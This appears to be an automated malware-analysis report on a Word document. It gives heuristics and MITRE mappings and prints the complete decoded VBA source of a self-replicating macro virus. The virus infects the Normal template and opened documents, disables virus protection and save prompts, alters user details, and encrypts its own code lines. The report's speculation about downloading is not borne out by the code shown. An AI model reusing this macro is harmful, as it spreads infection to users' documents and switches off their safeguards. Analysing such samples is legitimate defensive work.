MALICIOUS
120
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains a VBA macro that executes upon document opening, indicated by the 'document_open' subroutine and 'OLE_VBA_DOCOPEN' heuristic. The macro appears to be designed to obfuscate and potentially download additional content, as suggested by the 'dekrip' and 'enkrip' calls and the manipulation of template code. The presence of a legacy WordBasic auto-exec marker ('AutoOpen') further supports macro execution. The email address 'rio96@student.te.ugm.ac.id' was found within the script, which could be an indicator of the actor.
Heuristics 4
-
OLE document has large unaccounted-for region high OLE_SLACK_ANOMALYOLE file is 44,032 bytes but its declared streams total only 22,687 bytes — 21,345 bytes (48%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11421 bytes |
SHA-256: ef36ebf225317ddf0f5f4b8851c5da115477bde2813361cfc70e7a43d05d1930 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Const BOK = "Rio&Umi 4ever together"
'Read
Private Sub document_open()
Set AD = ActiveDocument.VBProject.VBComponents(1).CodeModule
Set NT = NormalTemplate.VBProject.VBComponents(1).CodeModule
Set Thi = ThisDocument.VBProject.VBComponents(1).CodeModule
ADi = AD.Find(BOK, 1, 1, 100, 100)
NTi = NT.Find(BOK, 1, 1, 100, 100)
If (ADi = True And NTi = True) Then
GoTo finish
End If
If Thi.lines(2, 1) = "'Unread" Then
Call dekrip
ElseIf Thi.lines(2, 1) = "'Read" Then
GoTo finish
End If
Application.Caption = "Rio&Umi 4ever together"
finish:
End Sub
Private Sub document_close()
On Error GoTo finish
Options.VirusProtection = False
Options.SaveNormalPrompt = False
Application.UserName = "Rio&Umi 4ever together"
Application.UserAddress = "rio96@student.te.ugm.ac.id"
Application.UserInitials = "Rio"
Set AD = ActiveDocument.VBProject.VBComponents(1).CodeModule
Set NT = NormalTemplate.VBProject.VBComponents(1).CodeModule
Set Thi = ThisDocument.VBProject.VBComponents(1).CodeModule
ADi = AD.Find(BOK, 1, 1, 100, 100)
NTi = NT.Find(BOK, 1, 1, 100, 100)
If (ADi = True And NTi = True) Then
GoTo finish
End If
If Thi.lines(2, 1) = "'Read" Then
Call enkrip
ElseIf Thi.lines(2, 1) = "'Unread" Then
GoTo finish
End If
If (ADi = True And NTi = False) Then
SAVIT = NormalTemplate.Saved
NT.deletelines 1, NT.Countoflines
codde = Thi.lines(1, Thi.Countoflines)
NT.addfromstring codde
Rem If savit Then NormalTemplate.Save
ElseIf (ADi = False And NTi = True) Then
SAVIT = ActiveDocument.Saved
AD.deletelines 1, AD.Countoflines
codde = Thi.lines(1, Thi.Countoflines)
AD.addfromstring codde
If SAVIT Then ActiveDocument.Save
End If
ActiveDocument.Save
finish:
ActiveDocument.Save
End Sub
Private Sub enkrip()
Dim test1 As String
'JumLine = ThisDocument.VBProject.VBComponents(1).CodeModule.Countoflines
For i = 46 To 59
test1 = "'"
Line = ThisDocument.VBProject.VBComponents(1).CodeModule.lines(i, 1)
panbar = Len(Line)
For t = 1 To panbar
Kar = Mid$(Line, t, 1)
test1 = test1 + (Chr(Asc(Kar) + 12))
Next
ThisDocument.VBProject.VBComponents(1).CodeModule.ReplaceLine i, test1
test1 = "'"
Next
ThisDocument.VBProject.VBComponents(1).CodeModule.ReplaceLine 2, "'Unread"
End Sub
Private Sub dekrip()
Dim test1 As String
'JumLine = ActiveDocument.VBProject.VBComponents(1).CodeModule.Countoflines
For i = 46 To 59
test1 = ""
Line = ThisDocument.VBProject.VBComponents(1).CodeModule.lines(i, 1)
panbar = Len(Line)
For t = 2 To panbar
Kar = Mid$(Line, t, 1)
test1 = test1 + (Chr(Asc(Kar) - 12))
Next
ThisDocument.VBProject.VBComponents(1).CodeModule.ReplaceLine i, test1
test1 = ""
Next
ThisDocument.VBProject.VBComponents(1).CodeModule.ReplaceLine 2, "'Read"
End Sub
' Processing file: /opt/analyzer/scan_staging/1e82da8e586d42a5bc56eb80a1ab3720.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 5798 bytes
' Line #0:
' Line #1:
' Dim (Const)
' LitStr 0x0016 "Rio&Umi 4ever together"
' VarDefn BOK
' Line #2:
' QuoteRem 0x0000 0x0004 "Read"
' Line #3:
' FuncDefn (Private Sub document_open())
' Line #4:
' SetStmt
' LitDI2 0x0001
' Ld ActiveDocument
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' Set AD
' Line #5:
' SetStmt
' LitDI2 0x0001
' Ld NormalTemplate
' MemLd VBProject
' ArgsMemLd VBComponents 0x0001
' MemLd CodeModule
' Set NT
' Line #6:
' SetStmt
' LitDI2 0x0001
' Ld ThisDocume
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.